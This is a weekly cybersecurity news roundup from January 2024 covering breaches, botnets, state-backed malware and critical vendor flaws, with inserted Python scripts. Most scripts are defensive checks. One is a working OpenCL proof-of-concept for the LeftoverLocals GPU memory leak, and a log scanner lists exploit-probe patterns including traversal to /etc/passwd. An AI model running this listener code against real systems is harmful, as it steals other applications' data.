Thursday, January 18th, 2024

Cybersecurity Week in Review (19/01/24)

167K People Exposed in Sweden Coop Data Leak

Ransomware gang Cactus says it has released data belonging to 167,000 people connected to Swedish grocery chain Coop after apparently failing to reach an agreement. The company has admitted to being breached in a cyberattack, but insists that it never received a demand for payment.

Ransomware gang Cactus took credit for last month’s attack and has not been idle with the stolen data – an update on its dedicated leaks website dated January 18th says that it has released the entire haul of 257GB.

Such tactics are commonplace among ransomware outfits, which pressure target organizations by making good on threats to publish stolen data, in the hope of compelling them, and future victims, to pay the demanded fee.

In this case, it would appear that Cactus has simply decided to cut its losses and shore up its reputation by releasing the data. The original cyberattack dates back to before Christmas, but the data disclosure was made by Cactus on January 18th.

However, in a curious twist, Coop appears to have told local media that it never received a demand for ransom payment – unusual in such cases.

“No demands have been received, we have not perceived any such either,” said a spokesperson. “We have never planned to pay anything that finances criminal activity either.”

For its part, Cactus claims to have “100% disclosed” the data, suggesting that the entire trove has been released into the wild.

According to local media in Sweden, the exposed data includes Social Security numbers, physical addresses, emails, and phone numbers. The 167,000 people exposed in the attack are thought to include customers, employees, and union members; Coop, which operates some 800 stores in Sweden, is a consumer cooperative owned by its members.

Coop said the attack took place on December 22nd, affecting card payments as well as undermining its core computer network, which also compromised its email and telephone connections.

Threat intelligence service FalconFeeds.io confirmed a week later that Coop had been listed as a victim of Cactus, along with Bell Group in the UK and Tridon Australia.

Coop insists it has seen no evidence to suggest the stolen data has been used – but that will be of little comfort to victims, given that such information can be traded down the line on dark web forums and might lie fallow for an extended period of time before being exploited by other criminals online.

Source –

Feds Warn of AndroxGh0st Botnet Targeting AWS, Azure, and Office 365 Credentials

CISA and the FBI warned that threat actors deploying the AndroxGh0st malware are creating a botnet for “victim identification and exploitation in target networks.”

A Python-based malware, AndroxGh0st was first documented in December 2022, with the malware inspiring several similar tools like AlienFox, GreenBot (aka Maintance), Legion, and Predator.

The cloud attack tool is capable of infiltrating servers vulnerable to known security flaws to access Laravel environment files and steal credentials for high-profile applications such as Amazon Web Services (AWS), Microsoft Office 365, SendGrid, and Twilio. Some of the notable flaws weaponized by the attackers include CVE-2017-9841 (PHPUnit), CVE-2021-41773 (Apache HTTP Server), and CVE-2018-15133 (Laravel Framework).

AndroxGh0st has multiple features to enable SMTP abuse including scanning, exploitation of exposed creds and APIs, and even deployment of web shells. For AWS specifically, the malware scans for and parses AWS keys but also has the ability to generate keys for brute-force attacks.

The compromised AWS credentials are subsequently used to create new users and user policies, and in several instances, set up new AWS instances for additional, malicious scanning activity.

These features make AndroxGh0st a potent threat that can be used to download additional payloads and retain persistent access to compromised systems.
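The three initial-access patterns named above all leave a recognisable trace in ordinary web server access logs. The following Python script is an added example, not code from the CISA/FBI advisory or from the page's source: it parses combined-format log lines and flags requests for Laravel `.env` files, hits on PHPUnit's `eval-stdin.php` (CVE-2017-9841), and the encoded-dot traversal used against Apache 2.4.49 (CVE-2021-41773), then groups the fired rules by source address. The log lines, IP addresses and rule names are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [17/Jan/2024:03:12:44 +0000] "GET /.env HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.10 - - [17/Jan/2024:03:12:45 +0000] "POST / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [17/Jan/2024:03:13:01 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 0 "-" "python-requests/2.31"
198.51.100.7 - - [17/Jan/2024:03:13:02 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 196 "-" "curl/8.4.0"
192.0.2.55 - - [17/Jan/2024:03:14:10 +0000] "GET /index.php HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# (rule name, regex applied to the request path with the query string removed)
RULES = [
    # Laravel keeps APP_KEY, database and mail/SMS provider credentials in .env; a 200 here is a credential leak.
    ("laravel-env-probe", re.compile(r"(?:^|/)\.env(?:\.[\w.-]*)?$", re.I)),
    # An exposed PHPUnit eval-stdin.php executes the POST body as PHP.
    ("phpunit-eval-stdin-CVE-2017-9841", re.compile(r"/vendor/phpunit/.*eval-stdin\.php$", re.I)),
    # Encoded-dot traversal against Apache 2.4.49 (.%2e, %2e. or %2e%2e path segments).
    ("apache-traversal-CVE-2021-41773", re.compile(r"/(?:\.%2e|%2e\.|%2e%2e)(?:/|$)", re.I)),
]


def parse_line(line):
    """Return the fields we need from one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["target"].split("?", 1)[0]
    return rec


def scan(log_text):
    """Return one hit per matching line: which rule fired, the source IP, and whether the probe succeeded."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, rx in RULES:
            if rx.search(rec["path"]):
                hits.append({
                    "rule": name, "ip": rec["ip"], "ts": rec["ts"],
                    "method": rec["method"], "path": rec["path"], "status": rec["status"],
                    # a 2xx on these paths means the probe found something, not merely scanned for it
                    "succeeded": 200 <= rec["status"] < 300,
                })
                break
    return hits


def by_source(hits):
    """Group fired rules by source IP so one scanner chaining several CVEs shows up as one actor."""
    grouped = defaultdict(set)
    for h in hits:
        grouped[h["ip"]].add(h["rule"])
    return dict(grouped)


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        flag = "SUCCESS" if h["succeeded"] else "probe"
        print(f'{h["ts"]} {h["ip"]:<14} {h["rule"]:<36} {h["method"]} {h["path"]} -> {h["status"]} ({flag})')
```

Run it against a real access log with `scan(open(path).read())`. The `succeeded` flag is the part worth alerting on: a scanner hitting `/.env` and getting a 404 is background noise, while a 200 means the environment file, and with it the AWS, SendGrid or Twilio keys the text describes, has already left the server, so the response should be to rotate those credentials rather than only to block the source address.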

The development arrives less than a week after it was revealed a related-but-distinct tool called FBot is being employed by attackers to breach web servers, cloud services, content management systems (CMS), and SaaS platforms.

It also follows an alert about a significant spike in botnet scanning activity since mid-November 2023, touching a peak of nearly 1.3 million distinct devices on January 5, 2024. A majority of the source IP addresses are associated with the U.S., China, Vietnam, Taiwan, and Russia.

Analysis of the activity has uncovered a rise in the use of cheap or free cloud and hosting servers that attackers are using to create botnet launch pads. These servers are used via trials, free accounts, or low-cost accounts, which provide anonymity and minimal overhead to maintain.

Source –

Microsoft: Iranian Hackers Target Researchers with New MediaPl Malware

Microsoft says that an Iranian state-backed hacking group is targeting high-profile employees of research organizations and universities across Europe and the United States in spearphishing attacks that deliver new backdoor malware.

The attackers, a subgroup of the notorious APT35 Iranian cyberespionage group (also known as Charming Kitten and Phosphorus) linked to the Islamic Revolutionary Guard Corps (IRGC), sent custom-tailored and difficult-to-detect phishing emails via previously compromised accounts.

“Since November 2023, Microsoft has observed a distinct subset of Mint Sandstorm (PHOSPHORUS) targeting high-profile individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the United Kingdom, and the United States,” Microsoft said.

“In this campaign, Mint Sandstorm used bespoke phishing lures in an attempt to socially engineer targets into downloading malicious files. In a handful of cases, Microsoft observed new post-intrusion tradecraft including the use of a new, custom backdoor called MediaPl.”

The MediaPl malware uses encrypted communication channels to exchange information with its command-and-control (C2) server and is designed to masquerade as Windows Media Player to evade detection.

Communications between MediaPl and its C2 server use AES CBC encryption and Base64 encoding, and the variant discovered on compromised devices comes with the ability to auto-terminate, temporarily halt, retry C2 communications, and execute C2 commands using the _popen function.

A second PowerShell-based backdoor malware known as MischiefTut helps drop additional malicious tools and provides reconnaissance capabilities, allowing the threat actors to run commands on the hacked systems and send the output to attacker-controlled servers.

This APT35 subset focuses on attacking and stealing sensitive data from the breached systems of high-value targets. It is known for previously targeting researchers, professors, journalists, and other individuals with knowledge of security and policy issues aligning with Iranian interests.

“These individuals, who work with or who have the potential to influence the intelligence and policy communities, are attractive targets for adversaries seeking to collect intelligence for the states that sponsor their activity, such as the Islamic Republic of Iran,” Microsoft said.

“Based on the identities of the targets observed in this campaign and the use of lures related to the Israel-Hamas war, it’s possible this campaign is an attempt to gather perspectives on events related to the war from individuals across the ideological spectrum.”

Between March 2021 and June 2022, APT35 backdoored at least 34 companies with previously unknown Sponsor malware in a campaign that targeted government and healthcare organizations, as well as firms in the financial services, engineering, manufacturing, technology, law, telecommunications, and other industry sectors.

The Iranian hacking group also used never-before-seen NokNok malware in attacks against macOS systems, another backdoor designed to collect, encrypt, and exfiltrate data from compromised Macs.

Another Iranian threat group tracked as APT33 (aka Refined Kitten or Holmium) breached defense organizations in extensive password spray attacks targeting thousands of organizations worldwide since February 2023 and was also recently seen attempting to breach defense contractors with new FalseFont malware.

Source –

Russian-web Provider Qwerty Down, Ukraine’s IT Army Takes Credit

The IT Army of Ukraine claims to have taken down the Moscow-based internet provider Qwerty in its latest attack on Russian infrastructure, the second time a major Russian telecom service has been hit in less than a week. Ukraine's pseudo-official hacker group boasted of the three-day attack on its Telegram channel on Tuesday.

“In Moscow, it’s not only cold, but also, there’s no internet,” The IT Army posted in both Russian and English.

“Qwerty, one of the largest internet providers in the enemy’s capital, has been unable to restore service for three days due to our attack,” it said.

“Rest assured, it’s used not only by civilians, but also by various special services in the city.“

The post continued to chide Qwerty’s parent company, Rostelecom, and another of its subsidiaries Central Telegraph, for failing to stop the attack.

“Central telegraph announced the return of telegraph services instead of providing internet. Just kidding, of course, but it sounds like a decent Plan B for a country built on caveman principles,” the hacker collective said.

The global internet monitoring site NetBlocks confirmed that Qwerty service was down for Russian users, showing the most severe drop in connectivity happening around January 15th.

According to Ukraine’s Kyiv Post, citing the Russian web monitoring site DownRadar, Qwerty had registered at least 127 outages in Moscow over the preceding 24 hours, followed by a series of complaints from Russian users.

Russian telecom service, M9com, suffered a similar attack on January 9th, also reported by NetBlocks. That attack was reported to be carried out by another hacktivist group known as the BlackJack group, also said to be connected to Ukraine’s law enforcement and intelligence arm, the Security Service of Ukraine (SSU).

Sources said the Blackjack hack knocked out internet and television services for about half the population of Moscow. The hit was said to be in retaliation for Russia’s mid-December attack on Kyivstar, one of Ukraine’s largest telecom providers, causing an outage for more than half of the war-torn nation for nearly a week.

The BlackJack group claimed that the M9com cyberattack was just a “warm-up” and Russia should expect another larger attack in the future.

Source –

Citrix, VMware, and Atlassian Hit with Critical Flaws

Citrix is warning of two zero-day security vulnerabilities in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) that are being actively exploited in the wild.

The flaws are listed below –

  • CVE-2023-6548 (CVSS score: 5.5) – Authenticated (low privileged) remote code execution on Management Interface (requires access to NSIP, CLIP, or SNIP with management interface access)
  • CVE-2023-6549 (CVSS score: 8.2) – Denial-of-service (requires that the appliance be configured as a Gateway or authorization and accounting, or AAA, virtual server)

The following customer-managed versions of NetScaler ADC and NetScaler Gateway are impacted by the shortcomings –

  • NetScaler ADC and NetScaler Gateway 14.1 before 14.1-12.35
  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-51.15
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.21
  • NetScaler ADC and NetScaler Gateway version 12.1 (currently end-of-life)
  • NetScaler ADC 13.1-FIPS before 13.1-37.176
  • NetScaler ADC 12.1-FIPS before 12.1-55.302, and
  • NetScaler ADC 12.1-NDcPP before 12.1-55.302

“Exploits of these CVEs on unmitigated appliances have been observed,” Citrix said, without sharing any additional specifics. Users of NetScaler ADC and NetScaler Gateway version 12.1 are recommended to upgrade their appliances to a supported version that patches the flaws.

It’s also advised to not expose the management interface to the internet to reduce the risk of exploitation. In recent months, multiple security vulnerabilities in Citrix appliances (CVE-2023-3519 and CVE-2023-4966) have been weaponized by threat actors to drop web shells and hijack existing authenticated sessions.
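Checking a fleet against the affected-version list above is mostly a matter of parsing NetScaler's version strings correctly, because the build number, not the release train, decides whether a box is fixed. The script below is an added example and not Citrix's own tooling: it reads either the bulletin's `13.1-51.15` style or the `NS13.1: Build 51.15.nc` form printed by `show version`, and classifies each appliance as patched, vulnerable, end-of-life or unknown. The fixed builds are taken from the list above; the inventory, hostnames and the assumption that the operator knows which image variant (standard, FIPS or NDcPP) each appliance runs are mine.

```python
import re

# First fixed build per release train, taken from the Citrix bulletin summarised above.
FIXED_BUILD = {
    "standard": {(14, 1): (12, 35), (13, 1): (51, 15), (13, 0): (92, 21)},
    "FIPS":     {(13, 1): (37, 176), (12, 1): (55, 302)},
    "NDcPP":    {(12, 1): (55, 302)},
}
# Trains that will not receive a fix; customers must move to a supported train.
END_OF_LIFE = {"standard": {(12, 1)}}

# Accepts both "13.1-51.15" (bulletin style) and "NS13.1: Build 51.15.nc" (as printed by `show version`).
VERSION_RE = re.compile(r"(\d+)\.(\d+)\D+?(?:Build\s*)?(\d+)\.(\d+)")


def parse_version(text):
    """Split a NetScaler version string into ((major, minor), (build, sub-build))."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"unrecognised NetScaler version string: {text!r}")
    major, minor, build, sub = (int(x) for x in m.groups())
    return (major, minor), (build, sub)


def assess(text, variant="standard"):
    """Classify one appliance as 'patched', 'vulnerable', 'eol' or 'unknown', with a reason."""
    train, build = parse_version(text)
    label = f"{variant} {train[0]}.{train[1]}"
    if train in END_OF_LIFE.get(variant, set()):
        return "eol", f"{label} is end-of-life and gets no fix; upgrade to a supported train"
    fixed = FIXED_BUILD.get(variant, {}).get(train)
    if fixed is None:
        return "unknown", f"{label} is not covered by the bulletin"
    if build < fixed:  # tuple comparison: build number first, then sub-build
        return "vulnerable", f"{label} build {build[0]}.{build[1]} is below fixed build {fixed[0]}.{fixed[1]}"
    return "patched", f"{label} build {build[0]}.{build[1]} is at or above fixed build {fixed[0]}.{fixed[1]}"


# Constructed inventory (hostname -> (`show version` output, image variant)); not a real fleet.
INVENTORY = {
    "ns-edge-01": ("NetScaler NS13.1: Build 51.15.nc, Date: Jan 8 2024", "standard"),
    "ns-edge-02": ("NetScaler NS13.1: Build 50.23.nc, Date: Nov 2 2023", "standard"),
    "ns-legacy":  ("NetScaler NS12.1: Build 65.25.nc", "standard"),
    "ns-fips-01": ("NetScaler NS12.1: Build 55.300.nc", "FIPS"),
}


def assess_fleet(inventory):
    """Map every host in the inventory to its (status, reason) pair."""
    return {host: assess(ver, variant) for host, (ver, variant) in inventory.items()}


if __name__ == "__main__":
    for host, (status, reason) in assess_fleet(INVENTORY).items():
        print(f"{host:<12} {status:<10} {reason}")
```

Two details matter in practice. The comparison is on `(build, sub-build)` tuples rather than on a float, so `13.1-50.23` correctly sorts below `13.1-51.15` while `12.1-55.300` sorts below `12.1-55.302`. And because 12.1 is end-of-life on the standard image but fixed on the FIPS and NDcPP images, the image variant has to be an input; a script that keys only on the train will misreport every FIPS appliance.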

The disclosure comes as VMware alerted customers of a critical security vulnerability in Aria Automation (previously vRealize Automation) that could allow an authenticated attacker to gain unauthorized access to remote organizations and workflows.

The issue has been assigned the CVE identifier CVE-2023-34063 (CVSS score: 9.9), with the Broadcom-owned virtualization services provider describing it as a “missing access control” flaw.

The versions impacted by the vulnerability are provided below –

  • VMware Aria Automation (8.11.x, 8.12.x, 8.13.x, and 8.14.x)
  • VMware Cloud Foundation (4.x and 5.x)

“The only supported upgrade path after applying the patch is to version 8.16,” VMware said. “If you upgrade to an intermediate version, the vulnerability will be reintroduced, requiring an additional round of patching.”

The development also follows Atlassian’s release of patches for over two dozen vulnerabilities, including a critical remote code execution (RCE) flaw impacting Confluence Data Center and Confluence Server.

The vulnerability, CVE-2023-22527, has been assigned a CVSS score of 10.0, indicating maximum severity. It affects versions 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, and 8.5.0-8.5.3. It’s worth noting that 7.19.x LTS versions are not affected by the vulnerability.

The issue has been addressed in versions 8.5.4, 8.5.5 (Confluence Data Center and Server), 8.6.0, 8.7.1, and 8.7.2 (Data Center only). Users who are on out-of-date instances are recommended to update their installations to the latest version available.

Source –

AI Data Exposed to ‘LeftoverLocals’ Attack via Vulnerable AMD, Apple, Qualcomm GPUs

Researchers have demonstrated how a new attack method leveraging a vulnerability in graphics processing units (GPUs) could be exploited to obtain potentially sensitive information from AI and other types of applications. The vulnerability, dubbed LeftoverLocals, is officially tracked as CVE-2023-4969.

Tests conducted showed that Apple, AMD and Qualcomm GPUs are affected. In addition, some GPUs from Imagination Technologies are impacted as well. Products from Arm, Intel, and Nvidia do not appear to be affected. 

Qualcomm and Apple have started releasing patches and AMD has published an advisory informing customers that it plans on releasing mitigations in March 2024, but noted that they will not be enabled by default. 

The LeftoverLocals vulnerability exists because some GPUs fail to properly isolate process memory. This could allow a local attacker to obtain sensitive information from a targeted application. For instance, a malicious app installed on the targeted device may be able to exploit the vulnerability to read GPU memory associated with another application, which could contain valuable data.

GPUs were originally developed for graphics acceleration, but they are now used for a wider range of applications, including artificial intelligence.  

The attacker only requires the ability to run GPU compute applications, e.g., through OpenCL, Vulkan, or Metal. These frameworks are well-supported and typically do not require escalated privileges. Using these, the attacker can read data that the victim has left in the GPU local memory simply by writing a GPU kernel that dumps uninitialized local memory. These attack programs, as the researchers’ proof-of-concept code demonstrates, can be less than 10 lines of code.
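The shape of that probe is simple enough to show in full. The following is an added example written for this page, not the researchers' published proof-of-concept: two OpenCL C kernels embedded in a Python driver. The `victim` kernel fills its workgroup-local memory with a marker value, and the separately launched `listener` kernel declares a local buffer it never writes and copies whatever the hardware left there back to the host. The marker value, buffer sizes and workgroup geometry are assumptions; pyopencl and numpy are needed only by `run()`, and on an unaffected or patched GPU the dump comes back as zeros.

```python
import struct

CANARY = 0x4C4C6F63  # arbitrary marker chosen for this demo

# OpenCL C source for both sides; the literal WORDS is substituted in below.
# 'victim' fills local memory with the marker. 'listener' declares a local buffer,
# never writes it, and copies whatever it finds there to a global buffer.
KERNELS = r"""
__kernel void victim(uint marker, __global uint *sink) {
    __local uint lm[WORDS];
    for (uint i = get_local_id(0); i < WORDS; i += get_local_size(0))
        lm[i] = marker;
    barrier(CLK_LOCAL_MEM_FENCE);
    if (get_local_id(0) == 0)   /* dependent read keeps the stores from being optimised away */
        sink[get_group_id(0)] = lm[WORDS - 1];
}

__kernel void listener(__global uint *out) {
    __local uint lm[WORDS];     /* deliberately uninitialised: this is the leak */
    barrier(CLK_LOCAL_MEM_FENCE);
    for (uint i = get_local_id(0); i < WORDS; i += get_local_size(0))
        out[get_group_id(0) * WORDS + i] = lm[i];
}
"""


def count_marker(dump, marker=CANARY):
    """Number of 32-bit little-endian words in the dump equal to the marker (pure Python, no GPU)."""
    n = len(dump) // 4
    words = struct.unpack(f"<{n}I", dump[: n * 4])
    return sum(1 for w in words if w == marker)


def leak_fraction(dump, marker=CANARY):
    """Share of the listener's local memory that still held the victim's marker."""
    total = len(dump) // 4
    return count_marker(dump, marker) / total if total else 0.0


def run(words=4096, groups=32, local_size=256):
    """Launch victim then listener on the first OpenCL device and return the leaked fraction.
    Imports pyopencl/numpy here so the analysis functions above stay importable without a GPU."""
    import numpy as np
    import pyopencl as cl

    ctx = cl.create_some_context(interactive=False)
    queue = cl.CommandQueue(ctx)
    prg = cl.Program(ctx, KERNELS.replace("WORDS", str(words))).build()
    sink = cl.Buffer(ctx, cl.mem_flags.WRITE_ONLY, 4 * groups)
    out = cl.Buffer(ctx, cl.mem_flags.WRITE_ONLY, 4 * words * groups)
    gsize, lsize = (groups * local_size,), (local_size,)
    prg.victim(queue, gsize, lsize, np.uint32(CANARY), sink)   # "victim" process leaves data behind
    prg.listener(queue, gsize, lsize, out)                      # "attacker" process reads it back
    host = np.empty(words * groups, dtype=np.uint32)
    cl.enqueue_copy(queue, host, out)
    queue.finish()
    return leak_fraction(host.tobytes())


if __name__ == "__main__":
    print(f"leaked marker words: {run():.1%} of listener local memory")
```

In a real attack the victim is someone else's process, so only the `listener` half belongs to the attacker; the canary writer is there to make the result measurable. The LLM eavesdropping described below is the same listener run in a loop, with the dump searched for the model's activation or token buffers instead of a fixed marker. The mitigation on the vendor side is to clear local memory between kernel launches, which is why AMD's fix costs performance and is off by default.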

The researchers demonstrated how an attacker could use LeftoverLocals to create covert channels on iPhones, iPads and Android devices, and they also developed a proof-of-concept that shows how an attacker could listen in on the victim’s conversation with an LLM application, specifically an AI chatbot.

They showed how an attacker could leverage leaked GPU memory to stealthily obtain the responses given by the chatbot to the user.

An attack program must be co-resident on the same machine and must be ‘listening’ at the same time that the victim is running a sensitive application on the GPU. This could occur in many scenarios: for example, if the attack program is co-resident with the victim on a shared cloud computer with a GPU. On a mobile device, the attack could be implemented in an app or a library. Listening can be implemented efficiently, and thus can be done repeatedly and constantly with almost no obvious performance degradation.

Source –

Leaked COVID Tests Expose Sensitive Patient Data

The Dutch COVID-19 testing platform Coronalab has exposed a database containing 11.8 million patient records, including COVID-19 certificates, test records, passport numbers, and other sensitive details. Coronalab left a misconfigured Google Cloud Storage bucket holding 1.7 million files, covering 11.7 million records on individuals from 44 countries.

The open bucket was dubbed “prod,” suggesting that Coronalab used it to store and manage data used in their operational and production IT environments. The team discovered the open bucket in late November, with Coronalab fixing the issue after being contacted.

Researchers claim that among the nearly 2 million exposed files, they’ve discovered 120K Covid certificates in QR code formats and 32K comma-separated values (CSV) files with over 11.7 million Covid test results.

The exposed documents cover a period from 2020 until 2022. The leak exposed a trove of sensitive and personally identifiable user data, including:

  • Patients’ names
  • Nationality
  • Dates of birth
  • Passport numbers
  • Covid test results
  • Email addresses
  • Phone numbers
  • Destination country if the test was taken for traveling reasons

The majority of leaked data likely belonged to Dutch nationals, as almost 89% of total leaked phone numbers came from the Netherlands. A further 1.5% were UK-based, 1.2% were from the USA, 0.8% were from Germany, and 0.8% were from Italy.

According to the team, disclosing sensitive personal data puts individuals at risk, as leaked details can be used for various nefarious purposes, such as targeted phishing attacks, fraud, or identity theft.

“Information security principles, particularly confidentiality, are critical in healthcare. A leak of coronavirus test results indicates a breach of confidentiality, indicating a failure in safeguarding sensitive medical information,” researchers said.

Since the Netherlands is governed by European Union law, the General Data Protection Regulation (GDPR) applies to how companies handle data. Exposing personal information, such as an individual’s name, address, date of birth, or other contact details, without consent could be considered a GDPR violation.

To mitigate the problems and avoid similar issues in the future, the team advises to:

  • Change the access controls to restrict public access and secure the bucket. Update permissions to ensure that only authorized users or services have the necessary access.
  • Conduct a thorough audit of the access controls for the bucket. Review IAM (Identity and Access Management) policies and permissions assigned to users and service accounts. Make sure that the principle of least privilege is followed.
  • Retrospectively review the bucket’s access logs to assess whether it was accessed by unauthorized actors.
  • Consider encrypting both data in transit and data at rest. Features like server-side encryption offered by Google Cloud Storage can improve the security of the data that is stored, with the caveat that Cloud Storage already encrypts objects at rest by default and that encryption does nothing for a bucket whose objects are readable by anyone; the access controls are the fix here.
  • Consider implementing security best practices, including regular audits, automated security checks, and employee training.
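The first two items of that list come down to one check: does any binding on the bucket grant a role to `allUsers` or `allAuthenticatedUsers`? The script below is an added example, not code from the researchers or from Coronalab: it audits a bucket IAM policy in the JSON shape returned by `gcloud storage buckets get-iam-policy gs://BUCKET --format=json`, reports public bindings, and produces a corrected policy with the public principals removed. The sample policy, bucket name, group and service account are constructed for the example.

```python
import copy
import json

PUBLIC_PRINCIPALS = {"allUsers", "allAuthenticatedUsers"}

# Constructed bucket IAM policy in the shape `gcloud storage buckets get-iam-policy --format=json`
# returns; not the real bucket's policy.
SAMPLE_POLICY = {
    "bindings": [
        {"role": "roles/storage.admin",
         "members": ["group:platform-admins@example.com"]},
        {"role": "roles/storage.objectViewer",
         "members": ["allUsers", "serviceAccount:api@example-project.iam.gserviceaccount.com"]},
        {"role": "roles/storage.legacyBucketReader",
         "members": ["allAuthenticatedUsers"]},
    ],
    "etag": "BwYBwYBwYBw=",
    "version": 1,
}


def public_bindings(policy):
    """Return (role, public principals) for every binding that grants access to anyone on the internet.
    allAuthenticatedUsers counts as public: any Google account anywhere qualifies."""
    findings = []
    for binding in policy.get("bindings", []):
        exposed = sorted(PUBLIC_PRINCIPALS & set(binding.get("members", [])))
        if exposed:
            findings.append((binding["role"], exposed))
    return findings


def remove_public_access(policy):
    """Copy of the policy with public principals stripped; bindings left empty are dropped.
    The etag is preserved so a later set-iam-policy fails if someone changed the policy in between."""
    fixed = copy.deepcopy(policy)
    kept = []
    for binding in fixed.get("bindings", []):
        binding["members"] = [m for m in binding.get("members", []) if m not in PUBLIC_PRINCIPALS]
        if binding["members"]:
            kept.append(binding)
    fixed["bindings"] = kept
    return fixed


def audit_report(policy, bucket="gs://BUCKET"):
    """Human-readable findings, one line per public binding."""
    lines = [f"{bucket}: {role} granted to {', '.join(principals)} -> PUBLIC"
             for role, principals in public_bindings(policy)]
    return lines or [f"{bucket}: no public bindings"]


if __name__ == "__main__":
    print("\n".join(audit_report(SAMPLE_POLICY)))
    print(json.dumps(remove_public_access(SAMPLE_POLICY), indent=2))
```

Feed it the output of `gcloud storage buckets get-iam-policy gs://BUCKET --format=json`, write the corrected policy to a file, and apply it with `gcloud storage buckets set-iam-policy gs://BUCKET policy.json`. Stripping the public principals closes the hole that existed; turning on uniform bucket-level access and the `storage.publicAccessPrevention` organization policy constraint stops it being reopened, which is the "regular audits, automated security checks" item above in enforceable form.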

Source –

Over 178,000 SonicWall Firewalls Potentially Vulnerable to Exploits

Over 178,000 SonicWall firewalls exposed over the internet are vulnerable to at least one of two security flaws that could be exploited to cause a denial-of-service (DoS) condition and potentially remote code execution (RCE). The two issues are fundamentally the same but exploitable at different HTTP URI paths due to reuse of a vulnerable code pattern.

The vulnerabilities in question are listed below –

  • CVE-2022-22274 (CVSS score: 9.4) – A stack-based buffer overflow vulnerability in the SonicOS via HTTP request allows a remote, unauthenticated attacker to cause DoS or potentially result in code execution in the firewall.
  • CVE-2023-0656 (CVSS score: 7.5) – A stack-based buffer overflow vulnerability in the SonicOS allows a remote, unauthenticated attacker to cause DoS, which could result in a crash.

While there are no reports of exploitation of the flaws in the wild, a proof-of-concept (PoC) for CVE-2023-0656 was published by the SSD Secure Disclosure team in April 2023.

The issues could be weaponized by bad actors to trigger repeated crashes and force the appliance to get into maintenance mode, requiring administrative action to restore normal functionality.

Perhaps most astonishing was the discovery that over 146,000 publicly-accessible devices are vulnerable to a bug that was published almost two years ago.

The development comes as watchTowr Labs uncovered multiple stack-based buffer overflow flaws in the SonicOS management web interface and SSL VPN portal that could lead to a firewall crash.

To safeguard against possible threats, it’s recommended to update to the latest firmware version and ensure that the management interface isn’t exposed to the internet.

Source –

Majorca City Calvià Extorted for $11M in Ransomware Attack

The Calvià City Council in Majorca announced it was targeted by a ransomware attack on Saturday, which impacted municipal services. Calvià is a historic town on the Spanish island of Majorca with a population of 50,000 and is one of Majorca’s major tourism hotspots, estimated to receive 1.6 million visits annually.

During the weekend, a cyberattack hit Calvia’s systems, forcing the council to form a crisis committee to evaluate the damage done and formulate impact mitigation plans.

“The Calvià City Council is working to restore normality as soon as possible, after having been the target, in the early hours of last Saturday, of a ransomware cyberattack, through which they intend to extort the council,” says the announcement from Calvià.

Mayor Juan Antonio Amengual stated that a team of IT specialists is currently performing forensic analysis to estimate the extent of unauthorized access and recover the impacted systems and services.

The IT outages have caused the City to suspend any administrative deadline for submitting allegations, requests, etc, until January 31, 2024. Citizens who urgently need to submit any document for registration can still do it through the General State Administration portal.

In the meantime, the municipality has informed the police’s cybercrime department about the incident and filed the necessary complaints along with preliminary forensic analysis information.

The announcement concludes with a statement of regret for the inconvenience, reminding people that citizen services can still be reached via the phone.

“The City Council deeply regrets the inconvenience this situation may cause and reiterates its firm commitment to resolve the current situation in the most orderly, quick, and efficient manner possible,” reads the statement. (machine translated)

“In any case, telephone and face-to-face communication is maintained normally.”

By the time of writing this, none of the major ransomware groups had assumed responsibility for the attack at Calvià, so the perpetrators remain unknown. However, a local media outlet has learned that the ransom set by the cybercriminals is €10,000,000, approximately $11M.

The mayor told the local press that the municipality would not be paying the ransom under any circumstances.

Ransomware poses a significant risk to entities of all sizes, including small towns, highlighting a growing concern in today’s digital landscape. Such attacks can put vital municipal services out of order, leading to major disruptions in daily operations and public services. The repercussions would be even more severe if such an attack occurred during peak tourism season.

Source –

US Court Docs Expose Fake Antivirus Renewal Phishing Tactics

In a seizure warrant application, the U.S. Secret Service sheds light on how threat actors stole $34,000 using fake antivirus renewal subscription emails.

The now-executed seizure warrant was submitted by Special Agent Jollif of the United States Secret Service (USSS) to recover funds stolen in a fake Norton subscription renewal email that led to the threat actor gaining access to a victim’s PC and bank account.

According to the court document submitted by a Special Agent of the United States Secret Service, the stolen money is stored in a Chase bank account belonging to someone named “Bingsong Zhou,” associated with phishing scams impersonating Norton Antivirus renewal subscriptions.

These phishing emails claim that the recipient is about to be charged for renewing an antivirus subscription license and to call the enclosed number to cancel it. The victim calls the phone number listed on the email, and from there, the scammers direct them to perform various actions such as installing remote access software on their computers, infecting themselves with malware, and entering their account credentials on a phishing page.

This type of scam has been ongoing for many years, but Jollif stated that the activity has recently risen to higher volumes.

One case highlighted in the court document mentions a victim who received a phishing email on November 28, 2023, alleging that he would be charged $349.95 for a Norton antivirus subscription unless he canceled the charge.

While the court document does not show the phishing email received in this attack, it is likely similar to those seen in past attacks.

After calling the scammers, the victim was tricked into giving them remote access to his laptop, supposedly needed to ensure the $349.95 was refunded to his account. At that point, the scammer alleged that $34,000 was refunded by error, and the victim was asked to return the amount to avoid legal trouble. The victim complied with the instruction, seeing that his checking account now had a new $34,000 deposit that he assumed originated from Norton.

